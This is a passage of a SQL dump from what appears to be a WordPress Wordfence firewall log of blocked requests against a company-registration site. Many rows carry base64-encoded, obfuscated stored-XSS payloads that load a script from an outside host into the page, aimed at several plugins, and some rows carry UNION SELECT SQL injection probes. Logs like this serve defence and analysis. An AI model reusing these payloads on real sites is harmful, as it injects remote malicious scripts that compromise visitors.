Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8121,1564715939.633867,1564715938.785100,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAiYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(7820,1564591604.958663,1564591604.566300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8120,1564715942.131693,1564715941.596400,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgImFzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8063,1564682623.346622,1564682621.398600,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(7819,1564591606.217365,1564591605.696400,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8062,1564682627.113105,1564682625.178300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Nzc10=\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7818,1564591623.857366,1564591623.183400,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8119,1564715945.004474,1564715944.561000,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(7813,1564591629.907522,1564591629.423600,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwLXBpd2lrXVt0cmFja2luZ19jb2RlXQ==\",\"paramValue\":\"PHNjcmlwdCAgIGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(7803,1564591071.193706,1564591069.941900,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=wcp_change_post_width',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dpZHRoXQ==\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7802,1564591073.665441,1564591072.543700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7926,1564614259.022284,1564614258.603000,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7927,1564614257.922184,1564614257.595900,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7928,1564614256.981073,1564614256.660900,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7812,1564591632.332016,1564591631.942300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 